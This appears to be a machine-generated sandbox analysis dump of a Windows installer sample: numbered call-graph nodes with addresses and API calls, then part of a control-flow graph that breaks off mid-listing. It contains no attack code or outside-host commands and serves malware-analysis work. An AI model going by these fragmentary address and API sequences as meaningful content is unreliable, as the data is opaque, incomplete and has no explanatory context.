4905->4907 4908 401bec GlobalAlloc 4906->4908 4911 401bc7 4906->4911 4913 401c07 4907->4913 4915 401b95 4907->4915 4909 406234 19 API calls 4908->4909 4909->4913 4910 406234 19 API calls 4914 4022f1 4910->4914 4920 4022f7 4911->4920 4926 406212 lstrcpynW 4911->4926 4913->4910 4913->4920 4918 405957 MessageBoxIndirectW 4914->4918 4924 406212 lstrcpynW 4915->4924 4916 401bd9 GlobalFree 4916->4920 4918->4920 4919 401ba4 4925 406212 lstrcpynW 4919->4925 4922 401bb3 4927 406212 lstrcpynW 4922->4927 4924->4919 4925->4922 4926->4916 4927->4920 5413 404771 5414 40479d 5413->5414 5415 4047ae 5413->5415 5474 40593b GetDlgItemTextW 5414->5474 5417 4047ba GetDlgItem 5415->5417 5420 404819 5415->5420 5419 4047ce 5417->5419 5418 4047a8 5421 4064a6 5 API calls 5418->5421 5423 4047e2 SetWindowTextW 5419->5423 5428 405c71 4 API calls 5419->5428 5424 406234 19 API calls 5420->5424 5435 4048fd 5420->5435 5472 404aac 5420->5472 5421->5415 5426 4042d6 20 API calls 5423->5426 5429 40488d SHBrowseForFolderW 5424->5429 5425 40492d 5430 405cce 18 API calls 5425->5430 5431 4047fe 5426->5431 5427 40433d 8 API calls 5432 404ac0 5427->5432 5433 4047d8 5428->5433 5434 4048a5 CoTaskMemFree 5429->5434 5429->5435 5436 404933 5430->5436 5437 4042d6 20 API calls 5431->5437 5433->5423 5438 405bc6 3 API calls 5433->5438 5439 405bc6 3 API calls 5434->5439 5435->5472 5476 40593b GetDlgItemTextW 5435->5476 5477 406212 lstrcpynW 5436->5477 5440 40480c 5437->5440 5438->5423 5441 4048b2 5439->5441 5475 40430b SendMessageW 5440->5475 5444 4048e9 SetDlgItemTextW 5441->5444 5449 406234 19 API calls 5441->5449 5444->5435 5445 404812 5447 4065ec 5 API calls 5445->5447 5446 40494a 5448 4065ec 5 API calls 5446->5448 5447->5420 5455 404951 5448->5455 5450 4048d1 lstrcmpiW 5449->5450 5450->5444 5453 4048e2 lstrcatW 5450->5453 5451 404992 5478 406212 lstrcpynW 5451->5478 5453->5444 5454 404999 5456 405c71 4 API calls 5454->5456 5455->5451 5459 405c12 2 API calls 5455->5459 5461 4049ea 5455->5461 5457 40499f GetDiskFreeSpaceW 5456->5457 5460 4049c3 MulDiv 5457->5460 5457->5461 5459->5455 5460->5461 5462 404a5b 5461->5462 5464 404bf6 22 API calls 5461->5464 5463 404a7e 5462->5463 5465 40140b 2 API calls 5462->5465 5479 4042f8 EnableWindow 5463->5479 5466 404a48 5464->5466 5465->5463 5468 404a5d SetDlgItemTextW 5466->5468 5469 404a4d 5466->5469 5468->5462 5471 404b2d 22 API calls 5469->5471 5470 404a9a 5470->5472 5480 404706 5470->5480 5471->5462 5472->5427 5474->5418 5475->5445 5476->5425 5477->5446 5478->5454 5479->5470 5481 404714 5480->5481 5482 404719 SendMessageW 5480->5482 5481->5482 5482->5472 5483 401a72 5484 402c31 19 API calls 5483->5484 5485 401a78 5484->5485 5486 402c31 19 API calls 5485->5486 5487 401a20 5486->5487 5488 404473 5489 40448b 5488->5489 5493 4045a5 5488->5493 5494 4042d6 20 API calls 5489->5494 5490 40460f 5491 4046e1 5490->5491 5492 404619 GetDlgItem 5490->5492 5499 40433d 8 API calls 5491->5499 5495 404633 5492->5495 5496 4046a2 5492->5496 5493->5490 5493->5491 5497 4045e0 GetDlgItem SendMessageW 5493->5497 5498 4044f2 5494->5498 5495->5496 5500 404659 6 API calls 5495->5500 5496->5491 5501 4046b4 5496->5501 5519 4042f8 EnableWindow 5497->5519 5503 4042d6 20 API calls 5498->5503 5504 4046dc 5499->5504 5500->5496 5505 4046ca 5501->5505 5506 4046ba SendMessageW 5501->5506 5508 4044ff CheckDlgButton 5503->5508 5505->5504 5509 4046d0 SendMessageW 5505->5509 5506->5505 5507 40460a 5510 404706 SendMessageW 5507->5510 5517 4042f8 EnableWindow 5508->5517 5509->5504 5510->5490 5512 40451d GetDlgItem 5518 40430b SendMessageW 5512->5518 5514 404533 SendMessageW 5515 404550 GetSysColor 5514->5515 5516 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5514->5516 5515->5516 5516->5504 5517->5512 5518->5514 5519->5507 5520 401573 5521 401583 ShowWindow 5520->5521 5522 40158c 5520->5522 5521->5522 5523 40159a ShowWindow 5522->5523 5524 402adb 5522->5524 5523->5524 5123 4014f5 KiUserCallbackDispatcher 5124 402adb 5123->5124 5525 100016b6 5526 100016e5 5525->5526 5527 10001b18 22 API calls 5526->5527 5528 100016ec 5527->5528 5529 100016f3 5528->5529 5530 100016ff 5528->5530 5533 10001272 2 API calls 5529->5533 5531 10001726 5530->5531 5532 10001709 5530->5532 5535 10001750 5531->5535 5536 1000172c 5531->5536 5534 1000153d 3 API calls 5532->5534 5537 100016fd 5533->5537 5538 1000170e 5534->5538 5540 1000153d 3 API calls 5535->5540 5539 100015b4 3 API calls 5536->5539 5541 100015b4 3 API calls 5538->5541 5542 10001731 5539->5542 5540->5537 5543 10001714 5541->5543 5544 10001272 2 API calls 5542->5544 5545 10001272 2 API calls 5543->5545 5546 10001737 GlobalFree 5544->5546 5547 1000171a GlobalFree 5545->5547 5546->5537 5548 1000174b GlobalFree 5546->5548 5547->5537 5548->5537 5125 401e77 5126 402c53 19 API calls 5125->5126 5127 401e7d 5126->5127 5128 402c53 19 API calls 5127->5128 5129 401e86 5128->5129 5130 402c53 19 API calls 5129->5130 5131 401e8f 5130->5131 5132 402c53 19 API calls 5131->5132 5133 401e98 5132->5133 5134 401423 26 API calls 5133->5134 5135 401e9f ShellExecuteW 5134->5135 5136 401ed0 5135->5136 5549 10002238 5550 10002296 5549->5550 5551 100022cc 5549->5551 5550->5551 5552 100022a8 GlobalAlloc 5550->5552 5552->5550 5137 40167b 5138 402c53 19 API calls 5137->5138 5139 401682 5138->5139 5140 402c53 19 API calls 5139->5140 5141 40168b 5140->5141 5142 402c53 19 API calls 5141->5142 5143 401694 MoveFileW 5142->5143 5144 4016a7 5143->5144 5150 4016a0 5143->5150 5146 406555 2 API calls 5144->5146 5148 402250 5144->5148 5145 401423 26 API calls 5145->5148 5147 4016b6 5146->5147 5147->5148 5149 4060b3 39 API calls 5147->5149 5149->5150 5150->5145 5560 1000103d 5561 1000101b 5 API calls 5560->5561 5562 10001056 5561->5562 5151 403dfe 5152 403f51 5151->5152 5153 403e16 5151->5153 5155 403f62 GetDlgItem GetDlgItem 5152->5155 5156 403fa2 5152->5156 5153->5152 5154 403e22 5153->5154 5158 403e40 5154->5158 5159 403e2d SetWindowPos 5154->5159 5160 4042d6 20 API calls 5155->5160 5157 403ffc 5156->5157 5165 401389 2 API calls 5156->5165 5161 404322 SendMessageW 5157->5161 5166 403f4c 5157->5166 5162 403e45 ShowWindow 5158->5162 5163 403e5d 5158->5163 5159->5158 5164 403f8c SetClassLongW 5160->5164 5189 40400e 5161->5189 5162->5163 5167 403e65 DestroyWindow 5163->5167 5168 403e7f 5163->5168 5169 40140b 2 API calls 5164->5169 5170 403fd4 5165->5170 5171 404280 5167->5171 5172 403e84 SetWindowLongW 5168->5172 5173 403e95 5168->5173 5169->5156 5170->5157 5176 403fd8 SendMessageW 5170->5176 5171->5166 5182 404290 ShowWindow 5171->5182 5172->5166 5174 403ea1 GetDlgItem 5173->5174 5175 403f3e 5173->5175 5179 403ed1 5174->5179 5180 403eb4 SendMessageW IsWindowEnabled 5174->5180 5181 40433d 8 API calls 5175->5181 5176->5166 5177 40140b 2 API calls 5177->5189 5178 404261 DestroyWindow EndDialog 5178->5171 5184 403ede 5179->5184 5185 403f25 SendMessageW 5179->5185 5186 403ef1 5179->5186 5196 403ed6 5179->5196 5180->5166 5180->5179 5181->5166 5182->5166 5183 406234 19 API calls 5183->5189 5184->5185 5184->5196 5185->5175 5190 403ef9 5186->5190 5191 403f0e 5186->5191 5188 403f0c 5188->5175 5189->5166 5189->5177 5189->5178 5189->5183 5192 4042d6 20 API calls 5189->5192 5197 4042d6 20 API calls 5189->5197 5212 4041a1 DestroyWindow 5189->5212 5194 40140b 2 API calls 5190->5194 5193 40140b 2 API calls 5191->5193 5192->5189 5195 403f15 5193->5195 5194->5196 5195->5175 5195->5196 5225 4042af 5196->5225 5198 404089 GetDlgItem 5197->5198 5199 4040a6 ShowWindow KiUserCallbackDispatcher 5198->5199 5200 40409e 5198->5200 5222 4042f8 EnableWindow 5199->5222 5200->5199 5202 4040d0 EnableWindow 5205 4040e4 5202->5205 5203 4040e9 GetSystemMenu EnableMenuItem SendMessageW 5204 404119 SendMessageW 5203->5204 5203->5205 5204->5205 5205->5203 5223 40430b SendMessageW 5205->5223 5224 406212 lstrcpynW 5205->5224 5208 404147 lstrlenW 5209 406234 19 API calls 5208->5209 5210 40415d SetWindowTextW 5209->5210 5211 401389 2 API calls 5210->5211 5211->5189 5212->5171 5213 4041bb CreateDialogParamW 5212->5213 5213->5171 5214 4041ee 5213->5214 5215 4042d6 20 API calls 5214->5215 5216 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5215->5216 5217 401389 2 API calls 5216->5217 5218 40423f 5217->5218 5218->5166 5219 404247 ShowWindow 5218->5219 5220 404322 SendMessageW 5219->5220 5221 40425f 5220->5221 5221->5171 5222->5202 5223->5205 5224->5208 5226 4042b6 5225->5226 5227 4042bc SendMessageW 5225->5227 5226->5227 5227->5188 5563 40287e 5564 402c53 19 API calls 5563->5564 5565 402885 FindFirstFileW 5564->5565 5566 4028ad 5565->5566 5570 402898 5565->5570 5568 4028b6 5566->5568 5571 406159 wsprintfW 5566->5571 5572 406212 lstrcpynW 5568->5572 5571->5568 5572->5570 5573 4019ff 5574 402c53 19 API calls 5573->5574 5575 401a06 5574->5575 5576 402c53 19 API calls 5575->5576 5577 401a0f 5576->5577 5578 401a16 lstrcmpiW 5577->5578 5579 401a28 lstrcmpW 5577->5579 5580 401a1c 5578->5580 5579->5580 5581 401000 5582 401037 BeginPaint GetClientRect 5581->5582 5583 40100c DefWindowProcW 5581->5583 5585 4010f3 5582->5585 5586 401179 5583->5586 5587 401073 CreateBrushIndirect FillRect DeleteObject 5585->5587 5588 4010fc 5585->5588 5587->5585 5589 401102 CreateFontIndirectW 5588->5589 5590 401167 EndPaint 5588->5590 5589->5590 5591 401112 6 API calls 5589->5591 5590->5586 5591->5590 5592 401503 5593 40150b 5592->5593 5595 40151e 5592->5595 5594 402c31 19 API calls 5593->5594 5594->5595 5596 402104 5597 402c53 19 API calls 5596->5597 5598 40210b 5597->5598 5599 402c53 19 API calls 5598->5599 5600 402115 5599->5600 5601 402c53 19 API calls 5600->5601 5602 40211f 5601->5602 5603 402c53 19 API calls 5602->5603 5604 402129 5603->5604 5605 402c53 19 API calls 5604->5605 5607 402133 5605->5607 5606 402172 CoCreateInstance 5611 402191 5606->5611 5607->5606 5608 402c53 19 API calls 5607->5608 5608->5606 5609 401423 26 API calls 5610 402250 5609->5610 5611->5609 5611->5610 4267 402805 4268 40280c 4267->4268 4274 402a86 4267->4274 4269 402c31 19 API calls 4268->4269 4270 402813 4269->4270 4271 402822 SetFilePointer 4270->4271 4272 402832 4271->4272 4271->4274 4275 406159 wsprintfW 4272->4275 4275->4274 4276 100027c7 4277 10002817 4276->4277 4278 100027d7 VirtualProtect 4276->4278 4278->4277 4589 40230c 4590 402314 4589->4590 4593 40231a 4589->4593 4591 402c53 19 API calls 4590->4591 4591->4593 4592 402328 4595 402336 4592->4595 4596 402c53 19 API calls 4592->4596 4593->4592 4594 402c53 19 API calls 4593->4594 4594->4592 4597 402c53 19 API calls 4595->4597 4596->4595 4598 40233f WritePrivateProfileStringW 4597->4598 5612 40190c 5613 401943 5612->5613 5614 402c53 19 API calls 5613->5614 5615 401948 5614->5615 5616 405a03 70 API calls 5615->5616 5617 401951 5616->5617 5618 401f8c 5619 402c53 19 API calls 5618->5619 5620 401f93 5619->5620 5621 4065ec 5 API calls 5620->5621 5622 401fa2 5621->5622 5623 401fbe GlobalAlloc 5622->5623 5625 402026 5622->5625 5624 401fd2 5623->5624 5623->5625 5626 4065ec 5 API calls 5624->5626 5627 401fd9 5626->5627 5628 4065ec 5 API calls 5627->5628 5629 401fe3 5628->5629 5629->5625 5633 406159 wsprintfW 5629->5633 5631 402018 5634 406159 wsprintfW 5631->5634 5633->5631 5634->5625 5635 40258c 5636 402c53 19 API calls 5635->5636 5637 402593 5636->5637 5640 405de7 GetFileAttributesW CreateFileW 5637->5640 5639 40259f 5640->5639 4606 40238e 4607 402393 4606->4607 4608 4023be 4606->4608 4629 402d5d 4607->4629 4610 402c53 19 API calls 4608->4610 4612 4023c5 4610->4612 4611 40239a 4613 4023a4 4611->4613 4614 4023db 4611->4614 4618 402c93 RegOpenKeyExW 4612->4618 4615 402c53 19 API calls 4613->4615 4617 4023ab RegDeleteValueW RegCloseKey 4615->4617 4617->4614 4619 402d27 4618->4619 4622 402cbe 4618->4622 4619->4614 4620 402ce4 RegEnumKeyW 4621 402cf6 RegCloseKey 4620->4621 4620->4622 4624 4065ec 5 API calls 4621->4624 4622->4620 4622->4621 4623 402d1b RegCloseKey 4622->4623 4625 402c93 5 API calls 4622->4625 4628 402d0a 4623->4628 4626 402d06 4624->4626 4625->4622 4627 402d36 RegDeleteKeyW 4626->4627 4626->4628 4627->4628 4628->4619 4630 402c53 19 API calls 4629->4630 4631 402d76 4630->4631 4632 402d84 RegOpenKeyExW 4631->4632 4632->4611 5641 401d0e 5642 402c31 19 API calls 5641->5642 5643 401d15 5642->5643 5644 402c31 19 API calls 5643->5644 5645 401d21 GetDlgItem 5644->5645 5646 4025a8 5645->5646 5646->5646 5647 1000164f 5648 10001516 GlobalFree 5647->5648 5650 10001667 5648->5650 5649 100016ad GlobalFree 5650->5649 5651 10001682 5650->5651 5652 10001699 VirtualFree 5650->5652 5651->5649 5652->5649 5653 40190f 5654 402c53 19 API calls 5653->5654 5655 401916 5654->5655 5656 405957 MessageBoxIndirectW 5655->5656 5657 40191f 5656->5657 5658 406d0f 5662 40675e 5658->5662 5659 4070c9 5660 4067e8 GlobalAlloc 5660->5659 5660->5662 5661 4067df GlobalFree 5661->5660 5662->5659 5662->5660 5662->5661 5662->5662 5663 406856 GlobalFree 5662->5663 5664 40685f GlobalAlloc 5662->5664 5663->5664 5664->5659 5664->5662 4633 402511 4634 402d5d 20 API calls 4633->4634 4635 40251b 4634->4635 4636 402c31 19 API calls 4635->4636 4637 402524 4636->4637 4638 402540 RegEnumKeyW 4637->4638 4639 40254c RegEnumValueW 4637->4639 4640 4028a1 4637->4640 4641 402565 RegCloseKey 4638->4641 4639->4640 4639->4641 4641->4640 5672 401491 5673 405371 26 API calls 5672->5673 5674 401498 5673->5674 5682 10001058 5684 10001074 5682->5684 5683 100010dd 5684->5683 5685 10001516 GlobalFree 5684->5685 5686 10001092 5684->5686 5685->5686 5687 10001516 GlobalFree 5686->5687 5688 100010a2 5687->5688 5689 100010b2 5688->5689 5690 100010a9 GlobalSize 5688->5690 5691 100010b6 GlobalAlloc 5689->5691 5694 100010c7 5689->5694 5690->5689 5692 1000153d 3 API calls 5691->5692 5692->5694 5693 100010d2 GlobalFree 5693->5683 5694->5693 5695 402d98 5696 402dc3 5695->5696 5697 402daa SetTimer 5695->5697 5698 402e11 5696->5698 5699 402e17 MulDiv 5696->5699 5697->5696 5701 402dd1 wsprintfW SetWindowTextW SetDlgItemTextW 5699->5701 5701->5698 4662 401c19 4663 402c31 19 API calls 4662->4663 4664 401c20 4663->4664 4665 402c31 19 API calls 4664->4665 4666 401c2d 4665->4666 4667 401c42 4666->4667 4668 402c53 19 API calls 4666->4668 4669 401c52 4667->4669 4670 402c53 19 API calls 4667->4670 4668->4667 4671 401ca9 4669->4671 4672 401c5d 4669->4672 4670->4669 4674 402c53 19 API calls 4671->4674 4673 402c31 19 API calls 4672->4673 4675 401c62 4673->4675 4676 401cae 4674->4676 4677 402c31 19 API calls 4675->4677 4678 402c53 19 API calls 4676->4678 4679 401c6e 4677->4679 4680 401cb7 FindWindowExW 4678->4680 4681 401c99 SendMessageW 4679->4681 4682 401c7b SendMessageTimeoutW 4679->4682 4683 401cd9 4680->4683 4681->4683 4682->4683 5702 403a19 5703 403a24 5702->5703 5704 403a28 5703->5704 5705 403a2b GlobalAlloc 5703->5705 5705->5704 4690 40249d 4691 402d5d 20 API calls 4690->4691 4692 4024a7 4691->4692 4693 402c53 19 API calls 4692->4693 4694 4024b0 4693->4694 4695 4024bb RegQueryValueExW 4694->4695 4698 4028a1 4694->4698 4696 4024e1 RegCloseKey 4695->4696 4697 4024db 4695->4697 4696->4698 4697->4696 4701 406159 wsprintfW 4697->4701 4701->4696 5706 40149e 5707 4022f7 5706->5707 5708 4014ac PostQuitMessage 5706->5708 5708->5707 5709 100010e1 5718 10001111 5709->5718 5710 100011d8 GlobalFree 5711 100012ba 2 API calls 5711->5718 5712 100011d3 5712->5710 5713 10001164 GlobalAlloc 5713->5718 5714 100011f8 GlobalFree 5714->5718 5715 10001272 2 API calls 5717 100011c4 GlobalFree 5715->5717 5716 100012e1 lstrcpyW 5716->5718 5717->5718 5718->5710 5718->5711 5718->5712 5718->5713 5718->5714 5718->5715 5718->5716 5718->5717 4726 4015a3 4727 402c53 19 API calls 4726->4727 4728 4015aa SetFileAttributesW 4727->4728 4729 4015bc 4728->4729 5719 404424 lstrlenW 5720 404443 5719->5720 5721 404445 WideCharToMultiByte 5719->5721 5720->5721 5729 40472a 5730 404760 5729->5730 5731 40473a 5729->5731 5733 40433d 8 API calls 5730->5733 5732 4042d6 20 API calls 5731->5732 5734 404747 SetDlgItemTextW 5732->5734 5735 40476c 5733->5735 5734->5730 5736 4025ae 5737 4025c2 5736->5737 5738 4025dd 5736->5738 5739 402c31 19 API calls 5737->5739 5740 402611 5738->5740 5741 4025e2 5738->5741 5746 4025c9 5739->5746 5743 402c53 19 API calls 5740->5743 5742 402c53 19 API calls 5741->5742 5745 4025e9 WideCharToMultiByte lstrlenA 5742->5745 5744 402618 lstrlenW 5743->5744 5744->5746 5745->5746 5747 40265b 5746->5747 5748 402645 5746->5748 5750 405ec8 5 API calls 5746->5750 5748->5747 5749 405e99 WriteFile 5748->5749 5749->5747 5750->5748 5751 401a30 5752 402c53 19 API calls 5751->5752 5753 401a39 ExpandEnvironmentStringsW 5752->5753 5754 401a4d 5753->5754 5756 401a60 5753->5756 5755 401a52 lstrcmpW 5754->5755 5754->5756 5755->5756 5757 4054b0 5758 4054d1 GetDlgItem GetDlgItem GetDlgItem 5757->5758 5759 40565a 5757->5759 5802 40430b SendMessageW 5758->5802 5761 405663 GetDlgItem CreateThread CloseHandle 5759->5761 5762 40568b 5759->5762 5761->5762 5763 4056b6 5762->5763 5765 4056a2 ShowWindow ShowWindow 5762->5765 5766 4056db 5762->5766 5767 405716 5763->5767 5770 4056f0 ShowWindow 5763->5770 5771 4056ca 5763->5771 5764 405541 5768 405548 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5764->5768 5804 40430b SendMessageW 5765->5804 5772 40433d 8 API calls 5766->5772 5767->5766 5775 405724 SendMessageW 5767->5775 5773 4055b6 5768->5773 5774 40559a SendMessageW SendMessageW 5768->5774 5777 405710 5770->5777 5778 405702 5770->5778 5776 4042af SendMessageW 5771->5776 5781 4056e9 5772->5781 5779 4055c9 5773->5779 5780 4055bb SendMessageW 5773->5780 5774->5773 5775->5781 5782 40573d CreatePopupMenu 5775->5782 5776->5766 5784 4042af SendMessageW 5777->5784 5783 405371 26 API calls 5778->5783 5786 4042d6 20 API calls 5779->5786 5780->5779 5785 406234 19 API calls 5782->5785 5783->5777 5784->5767 5787 40574d AppendMenuW 5785->5787 5788 4055d9 5786->5788 5789 40576a GetWindowRect 5787->5789 5790 40577d TrackPopupMenu 5787->5790 5791 4055e2 ShowWindow 5788->5791 5792 405616 GetDlgItem SendMessageW 5788->5792 5789->5790 5790->5781 5793 405798 5790->5793 5794 405605 5791->5794 5795 4055f8 ShowWindow 5791->5795 5792->5781 5796 40563d SendMessageW SendMessageW 5792->5796 5797 4057b4 SendMessageW 5793->5797 5803 40430b SendMessageW 5794->5803 5795->5794 5796->5781 5797->5797 5798 4057d1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5797->5798 5800 4057f6 SendMessageW 5798->5800 5800->5800 5801 40581f GlobalUnlock SetClipboardData CloseClipboard 5800->5801 5801->5781 5802->5764 5803->5792 5804->5763 4928 402032 4929 402044 4928->4929 4930 4020f6 4928->4930 4931 402c53 19 API calls 4929->4931 4932 401423 26 API calls 4930->4932 4933 40204b 4931->4933 4938 402250 4932->4938 4934 402c53 19 API calls 4933->4934 4935 402054 4934->4935 4936 40206a LoadLibraryExW 4935->4936 4937 40205c GetModuleHandleW 4935->4937 4936->4930 4939 40207b 4936->4939 4937->4936 4937->4939 4951 40665b WideCharToMultiByte 4939->4951 4942 4020c5 4946 405371 26 API calls 4942->4946 4943 40208c 4944 402094 4943->4944 4945 4020ab 4943->4945 4947 401423 26 API calls 4944->4947 4954 10001759 4945->4954 4948 40209c 4946->4948 4947->4948 4948->4938 4949 4020e8 FreeLibrary 4948->4949 4949->4938 4952 406685 GetProcAddress 4951->4952 4953 402086 4951->4953 4952->4953 4953->4942 4953->4943 4955 10001789 4954->4955 4996 10001b18 4955->4996 4957 10001790 4958 100018a6 4957->4958 4959 100017a1 4957->4959 4960 100017a8 4957->4960 4958->4948 5045 10002286 4959->5045 5028 100022d0 4960->5028 4965 100017cd 4966 1000180c 4965->4966 4967 100017ee 4965->4967 4970 10001812 4966->4970 4971 1000184e 4966->4971 5058 100024a9 4967->5058 4968 100017be 4974 100017c4 4968->4974 4975 100017cf 4968->4975 4977 100015b4 3 API calls 4970->4977 4979 100024a9 10 API calls 4971->4979 4972 100017d7 4972->4965 5055 10002b5f 4972->5055 4973 100017f4 5069 100015b4 4973->5069 4974->4965 5039 100028a4 4974->5039 5049 10002645 4975->5049 4983 10001828 4977->4983 4980 10001840 4979->4980 4987 10001895 4980->4987 5080 1000246c 4980->5080 4986 100024a9 10 API calls 4983->4986 4985 100017d5 4985->4965 4986->4980 4987->4958 4991 1000189f GlobalFree 4987->4991 4991->4958 4993 10001881 4993->4987 5084 1000153d wsprintfW 4993->5084 4994 1000187a FreeLibrary 4994->4993 5087 1000121b GlobalAlloc 4996->5087 4998 10001b3c 5088 1000121b GlobalAlloc 4998->5088 5000 10001d7a GlobalFree GlobalFree GlobalFree 5001 10001d97 5000->5001 5013 10001de1 5000->5013 5002 100020ee 5001->5002 5011 10001dac 5001->5011 5001->5013 5004 10002110 GetModuleHandleW 5002->5004 5002->5013 5003 10001c1d GlobalAlloc 5005 10001b47 5003->5005 5007 10002121 LoadLibraryW 5004->5007 5008 10002136 5004->5008 5005->5000 5005->5003 5006 10001c86 GlobalFree 5005->5006 5009 10001c68 lstrcpyW 5005->5009 5012 10001c72 lstrcpyW 5005->5012 5005->5013 5015 10002048 5005->5015 5023 10001cc4 5005->5023 5024 10001f37 GlobalFree 5005->5024 5026 1000122c 2 API calls 5005->5026 5094 1000121b GlobalAlloc 5005->5094 5006->5005 5007->5008 5007->5013 5095 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5008->5095 5009->5012 5011->5013 5091 1000122c 5011->5091 5012->5005 5013->4957 5014 10002188 5014->5013 5016 10002195 lstrlenW 5014->5016 5015->5013 5022 10002090 lstrcpyW 5015->5022 5096 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5016->5096 5020 10002148 5020->5014 5027 10002172 GetProcAddress 5020->5027 5021 100021af 5021->5013 5022->5013 5023->5005 5089 1000158f GlobalSize GlobalAlloc 5023->5089 5024->5005 5026->5005 5027->5014 5034 100022e8 5028->5034 5029 1000122c GlobalAlloc lstrcpynW 5029->5034 5031 10002415 GlobalFree 5031->5034 5036 100017ae 5031->5036 5032 100023d3 lstrlenW 5032->5031 5038 100023de 5032->5038 5033 100023ba GlobalAlloc CLSIDFromString 5033->5031 5034->5029 5034->5031 5034->5032 5034->5033 5035 1000238f GlobalAlloc WideCharToMultiByte 5034->5035 5098 100012ba 5034->5098 5035->5031 5036->4965 5036->4968 5036->4972 5038->5031 5102 100025d9 5038->5102 5041 100028b6 5039->5041 5040 1000295b CreateFileA 5042 10002979 5040->5042 5041->5040 5043 10002a75 5042->5043 5044 10002a6a GetLastError 5042->5044 5043->4965 5044->5043 5046 10002296 5045->5046 5047 100017a7 5045->5047 5046->5047 5048 100022a8 GlobalAlloc 5046->5048 5047->4960 5048->5046 5052 10002661 5049->5052 5050 100026b2 GlobalAlloc 5054 100026d4 5050->5054 5051 100026c5 5053 100026ca GlobalSize 5051->5053 5051->5054 5052->5050 5052->5051 5053->5054 5054->4985 5056 10002b6a 5055->5056 5057 10002baa GlobalFree 5056->5057 5105 1000121b GlobalAlloc 5058->5105 5060 10002530 StringFromGUID2 5066 100024b3 5060->5066 5061 10002541 lstrcpynW 5061->5066 5062 1000250b MultiByteToWideChar 5062->5066 5063 10002571 GlobalFree 5063->5066 5064 10002554 wsprintfW 5064->5066 5065 100025ac GlobalFree 5065->4973 5066->5060 5066->5061 5066->5062 5066->5063 5066->5064 5066->5065 5067 10001272 2 API calls 5066->5067 5106 100012e1 5066->5106 5067->5066 5110 1000121b GlobalAlloc 5069->5110 5071 100015ba 5072 100015c7 lstrcpyW 5071->5072 5074 100015e1 5071->5074 5075 100015fb 5072->5075 5074->5075 5076 100015e6 wsprintfW 5074->5076 5077 10001272 5075->5077 5076->5075 5078 100012b5 GlobalFree 5077->5078 5079 1000127b GlobalAlloc lstrcpynW 5077->5079 5078->4980 5079->5078 5081 10001861 5080->5081 5082 1000247a 5080->5082 5081->4993 5081->4994 5082->5081 5083 10002496 GlobalFree 5082->5083 5083->5082 5085 10001272 2 API calls 5084->5085 5086 1000155e 5085->5086 5086->4987 5087->4998 5088->5005 5090 100015ad 5089->5090 5090->5023 5097 1000121b GlobalAlloc 5091->5097 5093 1000123b lstrcpynW 5093->5013 5094->5005 5095->5020 5096->5021 5097->5093 5099 100012c1 5098->5099 5100 1000122c 2 API calls 5099->5100 5101 100012df 5100->5101 5101->5034 5103 100025e7 VirtualAlloc 5102->5103 5104 1000263d 5102->5104 5103->5104 5104->5038 5105->5066 5107 100012ea 5106->5107 5108 1000130c 5106->5108 5107->5108 5109 100012f0 lstrcpyW 5107->5109 5108->5066 5109->5108 5110->5071 5111 401db3 GetDC 5112 402c31 19 API calls 5111->5112 5113 401dc5 GetDeviceCaps MulDiv ReleaseDC 5112->5113 5114 402c31 19 API calls 5113->5114 5115 401df6 5114->5115 5116 406234 19 API calls 5115->5116 5117 401e33 CreateFontIndirectW 5116->5117 5118 4025a8 5117->5118 5810 401d33 5811 402c31 19 API calls 5810->5811 5812 401d44 SetWindowLongW 5811->5812 5813 402adb 5812->5813 5119 401735 5120 402c53 19 API calls 5119->5120 5121 40173c SearchPathW 5120->5121 5122 401757 5121->5122 5814 402ab6 SendMessageW 5815 402ad0 InvalidateRect 5814->5815 5816 402adb 5814->5816 5815->5816 5817 402837 5818 40283d 5817->5818 5819 402845 FindClose 5818->5819 5820 402adb 5818->5820 5819->5820 5821 4014b8 5822 4014be 5821->5822 5823 401389 2 API calls 5822->5823 5824 4014c6 5823->5824 5832 4029be 5833 402c31 19 API calls 5832->5833 5834 4029c4 5833->5834 5835 402a04 5834->5835 5836 4029eb 5834->5836 5837 4028a1 5834->5837 5839 402a1e 5835->5839 5840 402a0e 5835->5840 5838 4029f0 5836->5838 5845 402a01 5836->5845 5846 406212 lstrcpynW 5838->5846 5842 406234 19 API calls 5839->5842 5841 402c31 19 API calls 5840->5841 5841->5845 5842->5845 5845->5837 5847 406159 wsprintfW 5845->5847 5846->5837 5847->5837 5848 10002a7f 5849 10002a97 5848->5849 5850 1000158f 2 API calls 5849->5850 5851 10002ab2 5850->5851

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 4 403495-4034a9 call 40657c lstrlenA 1->4 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 4->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 25 403551-403556 22->25 26 403558-40355c 22->26 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 25->25 25->26 28 403563-403567 26->28 29 40355e-403562 26->29 32 403626-403633 call 405bf3 28->32 33 40356d-403573 28->33 29->28 30->31 48 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->48 51 403797-4037a7 call 403969 OleUninitialize 31->51 52 4036ec-4036f2 31->52 49 403635-403636 32->49 50 403637-40363d 32->50 37 403575-40357d 33->37 38 40358e-4035c7 33->38 44 403584 37->44 45 40357f-403582 37->45 39 4035e4-40361e 38->39 40 4035c9-4035ce 38->40 39->32 47 403620-403624 39->47 40->39 46 4035d0-4035d8 40->46 44->38 45->38 45->44 54 4035da-4035dd 46->54 55 4035df 46->55 47->32 56 403645-403653 call 406212 47->56 48->31 48->51 49->50 50->22 58 403643 50->58 68 4038cd-4038d3 51->68 69 4037ad-4037bd call 405957 ExitProcess 51->69 59 403787-40378e call 403a5b 52->59 60 4036f8-403703 call 405bf3 52->60 54->39 54->55 55->39 63 403658 56->63 58->63 67 403793 59->67 71 403751-40375b 60->71 72 403705-40373a 